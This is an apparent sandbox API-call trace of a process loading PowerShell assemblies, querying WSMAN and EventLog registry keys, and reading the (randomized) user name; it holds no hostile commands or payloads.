	[0343.442] VirtualQuery (in: lpAddress=0x1ab8e0, lpBuffer=0x1ac7a0, dwLength=0x30 | out: lpBuffer=0x1ac7a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.443] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x66e68fc4, Data2=0xbcb1, Data3=0x4e5b, Data4=([0]=0xb9, [1]=0x64, [2]=0xce, [3]=0x2f, [4]=0x1a, [5]=0x41, [6]=0xe9, [7]=0xe2))) returned 0x0
	[0343.443] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6d185235, Data2=0x621b, Data3=0x4ee0, Data4=([0]=0xa4, [1]=0x9a, [2]=0x53, [3]=0x2, [4]=0x42, [5]=0xe7, [6]=0x77, [7]=0xae))) returned 0x0
	[0343.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0343.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0343.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0343.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0343.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0343.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0343.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0343.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0343.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0343.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0343.730] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.730] CoTaskMemFree (pv=0x468180) 
	[0343.730] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.731] CoTaskMemFree (pv=0x468180) 
	[0343.731] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.731] CoTaskMemFree (pv=0x468180) 
	[0343.731] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.732] CoTaskMemFree (pv=0x468180) 
	[0343.735] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.735] CoTaskMemFree (pv=0x468180) 
	[0343.736] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.736] CoTaskMemFree (pv=0x468180) 
	[0343.736] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0343.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.736] CoTaskMemFree (pv=0x468180) 
	[0343.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad058 | out: phkResult=0x1ad058*=0x2d0) returned 0x0
	[0343.742] RegQueryInfoKeyW (in: hKey=0x2d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acf5c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acf58*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0343.742] CoTaskMemFree (pv=0x0) 
	[0343.742] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0343.742] RegEnumValueW (in: hKey=0x2d0, dwIndex=0x0, lpValueName=0x414cc0, lpcchValueName=0x1ad008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0343.742] CoTaskMemFree (pv=0x414cc0) 
	[0343.742] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0343.742] RegEnumValueW (in: hKey=0x2d0, dwIndex=0x1, lpValueName=0x414cc0, lpcchValueName=0x1ad008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0343.742] CoTaskMemFree (pv=0x414cc0) 
	[0343.742] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0343.742] RegEnumValueW (in: hKey=0x2d0, dwIndex=0x2, lpValueName=0x414cc0, lpcchValueName=0x1ad008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0343.742] CoTaskMemFree (pv=0x414cc0) 
	[0343.743] RegQueryValueExW (in: hKey=0x2d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acfec, lpData=0x0, lpcbData=0x1acfe8*=0x0 | out: lpType=0x1acfec*=0x1, lpData=0x0, lpcbData=0x1acfe8*=0x8) returned 0x0
	[0343.743] CoTaskMemAlloc (cb=0xc) returned 0x4811a0
	[0343.743] RegQueryValueExW (in: hKey=0x2d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acfbc, lpData=0x4811a0, lpcbData=0x1acfb8*=0x8 | out: lpType=0x1acfbc*=0x1, lpData="2.0", lpcbData=0x1acfb8*=0x8) returned 0x0
	[0343.743] CoTaskMemFree (pv=0x4811a0) 
	[0344.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfa8 | out: phkResult=0x1acfa8*=0x2f0) returned 0x0
	[0344.098] RegQueryInfoKeyW (in: hKey=0x2f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1aceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1aceac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acea8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.098] CoTaskMemFree (pv=0x0) 
	[0344.098] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.098] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x0, lpValueName=0x414cc0, lpcchValueName=0x1acf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1acf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0344.098] CoTaskMemFree (pv=0x414cc0) 
	[0344.098] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.098] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x1, lpValueName=0x414cc0, lpcchValueName=0x1acf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1acf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0344.098] CoTaskMemFree (pv=0x414cc0) 
	[0344.098] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.098] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x2, lpValueName=0x414cc0, lpcchValueName=0x1acf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1acf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0344.099] CoTaskMemFree (pv=0x414cc0) 
	[0344.099] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acf3c, lpData=0x0, lpcbData=0x1acf38*=0x0 | out: lpType=0x1acf3c*=0x1, lpData=0x0, lpcbData=0x1acf38*=0x8) returned 0x0
	[0344.099] CoTaskMemAlloc (cb=0xc) returned 0x480d80
	[0344.099] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acf0c, lpData=0x480d80, lpcbData=0x1acf08*=0x8 | out: lpType=0x1acf0c*=0x1, lpData="2.0", lpcbData=0x1acf08*=0x8) returned 0x0
	[0344.099] CoTaskMemFree (pv=0x480d80) 
	[0344.100] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0344.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.100] CoTaskMemFree (pv=0x468180) 
	[0344.105] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0344.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.105] CoTaskMemFree (pv=0x468180) 
	[0344.111] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfd8 | out: phkResult=0x1acfd8*=0x2f4) returned 0x0
	[0344.113] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acf4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acf48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acf4c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acf48*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.113] CoTaskMemFree (pv=0x0) 
	[0344.113] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.114] CoTaskMemFree (pv=0x0) 
	[0344.114] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.114] CoTaskMemFree (pv=0x0) 
	[0344.114] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.114] CoTaskMemFree (pv=0x0) 
	[0344.114] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.114] CoTaskMemFree (pv=0x0) 
	[0344.114] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.114] CoTaskMemFree (pv=0x0) 
	[0344.114] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.114] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.114] CoTaskMemFree (pv=0x414cc0) 
	[0344.115] CoTaskMemFree (pv=0x0) 
	[0344.115] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.115] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.115] CoTaskMemFree (pv=0x414cc0) 
	[0344.115] CoTaskMemFree (pv=0x0) 
	[0344.115] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.115] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.115] CoTaskMemFree (pv=0x414cc0) 
	[0344.115] CoTaskMemFree (pv=0x0) 
	[0344.115] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.115] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x414cc0, lpcchName=0x1acfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.115] CoTaskMemFree (pv=0x414cc0) 
	[0344.115] CoTaskMemFree (pv=0x0) 
	[0344.115] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x308) returned 0x0
	[0344.115] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.115] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x318) returned 0x0
	[0344.115] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.115] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x320) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.116] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x324) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.116] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x328) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.116] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x32c) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.116] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x330) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.116] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x334) returned 0x0
	[0344.116] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x0) returned 0x2
	[0344.117] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x338) returned 0x0
	[0344.117] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad038 | out: phkResult=0x1ad038*=0x33c) returned 0x0
	[0344.117] RegCloseKey (hKey=0x33c) returned 0x0
	[0344.117] RegCloseKey (hKey=0x2f4) returned 0x0
	[0344.118] RegCloseKey (hKey=0x338) returned 0x0
	[0344.408] CoTaskMemAlloc (cb=0x804) returned 0x1b827650
	[0344.408] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b827650, nSize=0x1ad248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad248) returned 0x1
	[0344.409] CoTaskMemFree (pv=0x1b827650) 
	[0344.410] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.410] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad288) returned 1
	[0344.410] CoTaskMemFree (pv=0x414cc0) 
	[0344.422] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf88 | out: phkResult=0x1acf88*=0x340) returned 0x0
	[0344.422] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.422] CoTaskMemFree (pv=0x0) 
	[0344.422] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.422] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.422] CoTaskMemFree (pv=0x414cc0) 
	[0344.422] CoTaskMemFree (pv=0x0) 
	[0344.422] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.422] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.423] CoTaskMemFree (pv=0x414cc0) 
	[0344.423] CoTaskMemFree (pv=0x0) 
	[0344.423] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0344.423] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x414cc0, lpcchName=0x1acf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0344.423] CoTaskMemFree (pv=0x414cc0) 
	[0344.423] CoTaskMemFree (pv=0x0) 
	[0344.423] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
